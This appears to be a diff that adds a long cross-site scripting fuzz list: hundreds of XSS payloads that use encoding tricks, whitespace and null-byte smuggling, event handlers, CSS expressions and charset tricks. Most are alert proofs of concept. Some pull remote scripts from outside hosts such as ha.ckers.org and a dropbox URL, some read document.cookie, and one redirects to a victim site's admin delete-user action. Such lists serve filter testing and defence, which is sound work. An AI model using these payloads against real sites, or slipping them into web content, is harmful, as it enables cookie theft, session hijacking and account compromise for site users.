+<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x 
\x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> +"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> 
+"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video 
onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG 
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE 
TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT 
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? 
+<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body 